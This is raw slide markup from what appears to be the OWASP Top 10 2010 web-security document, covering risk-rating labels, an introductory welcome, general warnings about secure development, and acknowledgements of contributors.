                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> (Was part of 2007 Top 10 – Entry A6)</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9"/>
                        </a:rPr>
                        <a:t>Insufficient Anti-automation</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRP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Insufficient Logging and Accountability (Related to 2007 Top 10 – Entry A6)</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10"/>
                        </a:rPr>
                        <a:t>Lack of Intrusion Detection and Response</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRP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11"/>
                        </a:rPr>
                        <a:t>Malicious File Execution</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> (Was 2007 Top 10 – Entry A3)</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21" name="Group 63"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1313178" y="2758710"/>
            <a:ext cx="107952" cy="171448"/>
            <a:chOff x="96" y="1344"/>
            <a:chExt cx="288" cy="624"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22"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23"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24"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25"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26"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27" name="Rectangle 89"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1114192" y="2989783"/>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28" name="AutoShape 142"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6210300" y="2743200"/>
            <a:ext cx="55245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29" name="AutoShape 149"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:endCxn id="28" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="5800725" y="2933700"/>
            <a:ext cx="409575" cy="2398"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:miter lim="800000"/>
            <a:headEnd type="oval" w="sm" len="sm"/>
            <a:tailEnd type="oval" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Rectangle 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3025209" y="3243561"/>
            <a:ext cx="712054" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prevalence</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4094027" y="3243561"/>
            <a:ext cx="801823" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Detectability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1882209" y="3243561"/>
            <a:ext cx="817853" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5282634" y="3243561"/>
            <a:ext cx="518091" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Impact</a:t>
            </a:r>
            <a:endParaRPr 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444" y="0"/>
            <a:ext cx="6887444" cy="914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143000"/>
          <a:ext cx="6858000" cy="2362200"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D113A9D2-9D6B-4929-AA2D-F23B5EE8CBE7}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="391093">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>Welcome</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="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19711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Welcome to the OWASP Top 10 2010!  This significant update presents a more concise,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> risk focused list of the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" u="none" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Top 10 Most Critical Web Application Security Risks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. The OWASP Top 10 has always been about risk, but this update makes this much more clear than previous editions. It also provides additional information on how to assess these risks for your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For each item in the top 10, this release discusses the general likelihood and consequence factors that are used to categorize the typical severity of the risk. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>It then presents guidance on how to verify whether you have problems in this area, how to avoid</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> them, some example flaws, and pointers to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>links with more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The primary aim of the OWASP Top 10 is to educate developers, designers, architects, managers, and organizations about the consequences of the most important web application security weaknesses. The Top 10 provides basic techniques to protect against these high risk problem areas – and also provides guidance on where to go from here. </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0" y="3581401"/>
          <a:ext cx="3352800" cy="5571740"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D113A9D2-9D6B-4929-AA2D-F23B5EE8CBE7}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3352800"/>
              </a:tblGrid>
              <a:tr h="344420">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Warnings</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt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52181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Don’t stop at 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. There are hundreds of issues that could affect the overall security of a web application as discussed in the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Developer’s Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>. This </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>is</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>essential reading for anyone developing web applications today. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Guidance on how to effectively find vulnerabilities in web applications are provided in the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP Testing Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>OWASP Code Review Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, which have both been significantly updated since the previous release of the OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="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Constant</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> change</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. This Top 10 will continue </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>change.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Even </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>without changing a single line of your application’s code, you may already be vulnerable to something nobody ever thought of before. Please review the advice at the end of the Top 10 in “</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>W</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" i="1" u="none" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>hat’s Next For Developers, Verifiers, and Organizations</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>” </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>for more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rPr>
                        <a:t>Think positive</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>When you’re ready to stop chasing vulnerabilities and focus on establishing strong application security controls, O</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>WASP has just produced the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>Application Security Verification Standard (ASVS)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> as a guide to organizations and application</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> reviewers on what to verify.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="5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Use tools wisely</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. Security</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> vulnerabilities can be quite complex and buried in mountains of code. In virtually all cases, the most cost-effective approach for finding and eliminating these weaknesses is human experts armed with good tools.</a:t>
                      </a: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Push left</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. Secure web applications are only possible when a secure software development lifecycle is used. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>For guidance on </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>how to implement a secure SDLC, w</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>e recently released the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>Open Software Assurance Maturity Model (SAMM)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, which is a major update to the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>OWASP CLASP Project</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>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Table 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3429000" y="3581400"/>
          <a:ext cx="3429000" cy="5567285"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D113A9D2-9D6B-4929-AA2D-F23B5EE8CBE7}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3429000"/>
              </a:tblGrid>
              <a:tr h="343829">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>Acknowledgements</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1"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5223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mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Thanks to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>Aspect Security</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> for initiating, leading, and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>updating the OWASP Top 10 since its inception in 2003, and to its primary authors: Jeff Williams and Dave Wichers.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We’d like to thank those organizations that </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>contributed their vulnerability prevalence data to support the 2010 update:</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                      </a:br>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="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solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>Aspect Security</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>MITRE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> –</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId12"/>
                        </a:rPr>
                        <a:t>CVE</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="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err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>Softtek</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="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err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>WhiteHat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t> Security Inc.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t>Statistics</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="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dirty="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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>We’d also like to thank those</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> who have contributed significant content or time reviewing this update of the Top 10:</a:t>
                      </a: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baseline="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Mike </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Boberski</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> (Booz Allen Hamilton)</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Juan Carlos Calderon (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Softtek</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="120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Michael</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> Coates (Aspect Security)</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2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Jeremiah Grossman (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>WhiteHat</a:t>
                      </a:r>
                      <a:r>
